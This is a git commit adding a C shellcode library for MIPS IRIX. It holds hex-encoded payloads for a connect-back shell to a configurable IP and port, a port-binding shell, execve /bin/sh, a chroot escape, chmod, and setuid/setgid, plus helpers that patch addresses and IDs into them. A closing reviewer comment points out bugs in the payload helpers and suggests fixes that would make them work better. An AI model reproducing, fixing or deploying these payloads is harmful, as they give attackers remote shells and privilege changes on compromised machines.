From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/shellkit/mips_irix.c | 231 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 231 insertions(+)
 create mode 100644 other/shellkit/mips_irix.c

(limited to 'other/shellkit/mips_irix.c')

diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c
new file mode 100644
index 0000000..33bf38c
--- /dev/null
+++ b/other/shellkit/mips_irix.c
@@ -0,0 +1,231 @@
+
+#include 
+#include 
+#include 
+#include "shellcode.h"
+#include "mips.h"
+
+
+/* tested on: IP20 R4000 6.5
+ */
+shellcode mips_irix_chmod = {
+ "mips-irix-chmod",
+ 64,
+ "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"
+ /* ^^ ^^ = uid ^ 0x5555 */
+ "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"
+ /* ^^ ^^ = gid ^ 0x5555 */
+ "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"
+ /* ^^ ^^ = length of appended pathname + 0xfeb8 */
+ "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
+ "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
+ "\x24\x18\x72\xec",
+};
+
+/* tested on: IP20 R4000 6.5
+ */
+shellcode mips_irix_chroot = {
+ "mips-irix-chroot",
+ 84,
+ "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
+ "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
+ "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
+ "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
+ "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
+ "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
+ "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
+};
+
+/* tested on: IP20 R4000 6.5
+ */
+shellcode mips_irix_connectsh = {
+ "mips-irix-connectsh",
+ 172,
+ "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
+ "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
+ "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
+ "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"
+ /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */
+ "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"
+ /* ^^ ^^ ip .3.4 */
+ "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
+ "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
+ "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
+ "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
+ "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
+ "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
+ "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
+ "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
+ "\x24\x02\x04\x23\x01\x01\x01\x0c"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
+};
+
+/* tested on: IP20 R4000 6.5
+ */
+shellcode mips_irix_execvesh = {
+ "mips-irix-execvesh",
+ 48,
+ "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
+ "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
+ "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
+ "\x01\x01\x01\x0c"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
+};
+
+shellcode mips_irix_exit = {
+ "mips-irix-exit",
+ 16,
+ "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
+ "\x24\x18\x73\x50",
+};
+
+/* tested on: IP20 R4000 6.5
+ * IP30 R10000 6.5.7m (thanks oxigen ;)
+ */
+shellcode mips_irix_portshellsh = {
+ "mips-irix-portshellsh",
+ 188, /* yay! well optimized */
+ "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
+ "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
+ "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
+ "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */
+ "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
+ "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
+ "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
+ "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
+ "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
+ "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
+ "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
+ "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
+ "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
+ "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
+ "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
+};
+
+/* tested on: IP20 R4000 6.5
+ */
+shellcode mips_irix_read = {
+ "mips-irix-read",
+ 56,
+ "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
+ "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
+ "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
+ "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
+ "\x01\x01\x01\x0c\x24\x18\x73\x50",
+};
+
+shellcode mips_irix_setgid = {
+ "mips-irix-setgid",
+ 16,
+ "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */
+ "\x01\x01\x01\x0c",
+};
+
+shellcode mips_irix_setreuid = {
+ "mips-irix-setreuid",
+ 24,
+ "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"
+ /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */
+ "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
+};
+
+
+shellcode * mips_irix_shellcodes[] = {
+ &mips_irix_chmod,
+ &mips_irix_chroot,
+ &mips_irix_connectsh,
+ &mips_irix_execvesh,
+ &mips_irix_exit,
+ &mips_irix_portshellsh,
+ &mips_irix_read,
+ &mips_irix_setgid,
+ &mips_irix_setreuid,
+ NULL,
+};
+
+
+arch mips_irix = {
+ "mips-irix",
+ 4,
+ mips_nop,
+ mips_irix_shellcodes,
+};
+
+
+
+/* set the uid, gid and pathname of the mips-irix-chmod code at `code'
+ * XXX: be sure to have strlen(pathname) bytes left after code
+ */
+void
+mips_irix_chmod_setup (unsigned char *code, char *pathname,
+ unsigned short int uid, unsigned short int gid)
+{
+ unsigned short int len = 0xfeb8;
+
+ uid ^= 0x5555;
+ code[6] = (uid >> 8) & 0xff;
+ code[7] = uid & 0xff;
+
+ gid ^= 0x5555;
+ code[14] = (gid >> 8) & 0xff;
+ code[15] = gid & 0xff;
+
+ len += strlen (pathname);
+ code[26] = (len >> 8) & 0xff;
+ code[27] = len & 0xff;
+
+ memcpy (code + 64, pathname, strlen (pathname));
+
+ return;
+}
+
+
+/* ip and port in network byte order
+ */
+void
+mips_irix_connectsh_setup (unsigned char *code,
+ unsigned long int ip, unsigned short int port)
+{
+ code[38] = (port >> 8) & 0xff;
+ code[39] = port & 0xff;
+
+ code[46] = (ip >> 24) & 0xff;
+ code[47] = (ip >> 16) & 0xff;
+ code[50] = (ip >> 8) & 0xff;
+ code[51] = ip & 0xff;
+
+ return;
+}
+
+
+/* set the gid within the 'mips-irix-setgid' code at `code'
+ */
+void
+mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
+{
+ gid ^= 0x5555;
+
+ code[2] = (gid >> 8) & 0xff;
+ code[3] = gid & 0xff;
+
+ return;
+}
+
+
+void
+mips_irix_setreuid_setup (unsigned char *code,
+ unsigned short int ruid, unsigned short int euid)
+{
+ ruid ^= 0x5555;
+ code[2] = (ruid >> 8) & 0xff;
+ code[3] = ruid & 0xff;
+
+ euid ^= 0x5555;
+ code[6] = (euid >> 8) & 0xff;
+ code[7] = euid & 0xff;
+
+ return;
+}
+
+
-- 
cgit v1.3
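Review bot: mips_irix_chmod_setup xors gid with 0x5555 before storing it at code[14..15], but the instruction in mips_irix_chmod that is meant to undo it (bytes 16–19, `\x38\xc6\x05\x55`, i.e. xori $a2,$a2,0x0555) carries 0x0555, so unless the listing is garbled the gid handed to the syscall comes out as gid ^ 0x5000 — either that byte should be `\x55` (as in the uid stub `\x38\xa5\x55\x55` and in the setgid/setreuid stubs) or the helper should do `gid ^= 0x0555;` to match the stub as shipped. The same helper also has no bound on the pathname: `memcpy (code + 64, pathname, strlen (pathname));` writes past the 64-byte stub into whatever the caller placed there, and `len` is an unsigned short starting at 0xfeb8, so any pathname longer than 0x147 bytes silently wraps the 16-bit immediate patched into code[26..27] and the stub then points at the wrong length; I would reject that case up front with `if (strlen (pathname) > 0x147) return;` and state the limit in the XXX comment rather than leaving it to the caller. Smaller point: mips_irix_portshellsh has its listening port at code[38..39] (`/* 0x4141 = port */`) but, unlike connectsh, no `_setup` helper, so callers have to patch the bytes by hand; a one-line helper mirroring mips_irix_connectsh_setup's port lines would keep the two stubs consistent.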